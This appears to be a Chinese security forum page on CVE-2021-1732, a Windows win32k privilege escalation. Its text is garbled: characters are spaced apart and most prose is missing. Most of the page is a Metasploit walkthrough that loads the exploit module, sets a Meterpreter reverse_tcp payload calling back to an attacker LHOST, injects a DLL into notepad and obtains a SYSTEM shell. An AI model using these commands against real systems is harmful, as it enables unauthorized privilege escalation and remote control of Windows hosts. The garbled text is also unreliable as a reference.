[28824] 2021-03-24_CVE-2021-1732#添加漏洞

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-03-24_CVE-2021-1732#添加漏洞 C V E - 2 0 2 1 - 1 7 3 2   O t s   2 0 2 1 - 0 3 - 2 4 C V E - 2 0 2 1 - 1 7 3 2 w i n 3 2 k 访 使 P I D   4 S Y S T E M B S O D 1 8 0 3 2 0 H 2 6 W i n d o w s   1 0 1 7 0 9 1 7 0 9 M S R C R D L L D L L 使 M i x i n       x 6 4   W i n d o w s   M e t e r p r e t e r W i n d o w s   1 0   1 8 0 3 - 2 0 H 2     N t U s e r C o n s o l e C o n t r o l m s f c o n s o l e
h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / p u l l / 1 4 9 0 7 m s f 6   p a y l o a d ( w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p )   >   s e s s i o n s   - i   - 1 [ * ]   S t a r t i n g   i n t e r a c t i o n   w i t h   1 . . . m e t e r p r e t e r   >   g e t u i d S e r v e r   u s e r n a m e :   D E S K T O P - J K M 0 H A D a l i d d l e m e t e r p r e t e r   >   s y s i n f o C o m p u t e r                 :   D E S K T O P - J K M 0 H A D O S                             :   W i n d o w s   1 0   ( 1 0 . 0   B u i l d   1 9 0 4 2 ) . A r c h i t e c t u r e         :   x 6 4 S y s t e m   L a n g u a g e   :   e n _ U S D o m a i n                     :   W O R K G R O U P L o g g e d   O n   U s e r s   :   2 M e t e r p r e t e r           :   x 6 4 / w i n d o w s m e t e r p r e t e r   >   g e t s y s t e m [ - ]   p r i v _ e l e v a t e _ g e t s y s t e m :   O p e r a t i o n   f a i l e d :   A c c e s s   i s   d e n i e d .   T h e   f o l l o w i n g   w a s   a t t e m p t e d : [ - ]   N a m e d   P i p e   I m p e r s o n a t i o n   ( I n   M e m o r y / A d m i n ) [ - ]   N a m e d   P i p e   I m p e r s o n a t i o n   ( D r o p p e r / A d m i n ) [ - ]   T o k e n   D u p l i c a t i o n   ( I n   M e m o r y / A d m i n ) [ - ]   N a m e d   P i p e   I m p e r s o n a t i o n   ( R P C S S   v a r i a n t ) m e t e r p r e t e r   >   b a c k g r o u n d   [ * ]   B a c k g r o u n d i n g   s e s s i o n   1 . . . m s f 6   p a y l o a d ( w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p )   >   u s e   e x p l o i t / w i n d o w s / l o c a l / c v e _ 2 0 2 1 _ 1 7 3 2 _ w i n 3 2 k   [ * ]   U s i n g   c o n f i g u r e d   p a y l o a d   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p m s f 6   e x p l o i t ( w i n d o w s / l o c a l / c v e _ 2 0 2 1 _ 1 7 3 2 _ w i n 3 2 k )   >   s e t   S E S S I O N   - 1 S E S S I O N   = >   - 1 m s f 6   e x p l o i t ( w i n d o w s / l o c a l / c v e _ 2 0 2 1 _ 1 7 3 2 _ w i n 3 2 k )   >   s e t   P A Y L O A D   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p P A Y L O A D   = >   w i n d o w s / x 6 4 / m e t e r p r e t e r / r e v e r s e _ t c p m s f 6   e x p l o i t ( w i n d o w s / l o c a l / c v e _ 2 0 2 1 _ 1 7 3 2 _ w i n 3 2 k )   >   s e t   L H O S T   1 9 2 . 1 6 8 . 1 5 9 . 1 2 8   L H O S T   = >   1 9 2 . 1 6 8 . 1 5 9 . 1 2 8 m s f 6   e x p l o i t ( w i n d o w s / l o c a l / c v e _ 2 0 2 1 _ 1 7 3 2 _ w i n 3 2 k )   >   e x p l o i t [ * ]   S t a r t e d   r e v e r s e   T C P   h a n d l e r   o n   1 9 2 . 1 6 8 . 1 5 9 . 1 2 8 : 4 4 4 4   [ * ]   E x e c u t i n g   a u t o m a t i c   c h e c k   ( d i s a b l e   A u t o C h e c k   t o   o v e r r i d e ) [ + ]   T h e   t a r g e t   a p p e a r s   t o   b e   v u l n e r a b l e . [ * ]   L a u n c h i n g   n o t e p a d   t o   h o s t   t h e   D L L . . . [ + ]   P r o c e s s   7 6 7 2   l a u n c h e d . [ * ]   R e f l e c t i v e l y   i n j e c t i n g   t h e   D L L   i n t o   7 6 7 2 . . . [ * ]   S e n d i n g   s t a g e   ( 2 0 0 2 6 2   b y t e s )   t o   1 9 2 . 1 6 8 . 1 5 9 . 6 6 [ + ]   E x p l o i t   f i n i s h e d ,   w a i t   f o r   ( h o p e f u l l y   p r i v i l e g e d )   p a y l o a d   e x e c u t i o n   t o   c o m p l e t e . [ * ]   M e t e r p r e t e r   s e s s i o n   2   o p e n e d   ( 1 9 2 . 1 6 8 . 1 5 9 . 1 2 8 : 4 4 4 4   - >   1 9 2 . 1 6 8 . 1 5 9 . 6 6 : 6 0 8 3 8 )   a t   2 0 2 1 - 0 3 - 1 5   1 7 : 5 6 : 2 8   - 0 4 0 0 m e t e r p r e t e r   >   g e t u i d S e r v e r   u s e r n a m e :   N T   A U T H O R I T Y S Y S T E M m e t e r p r e t e r   >  

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则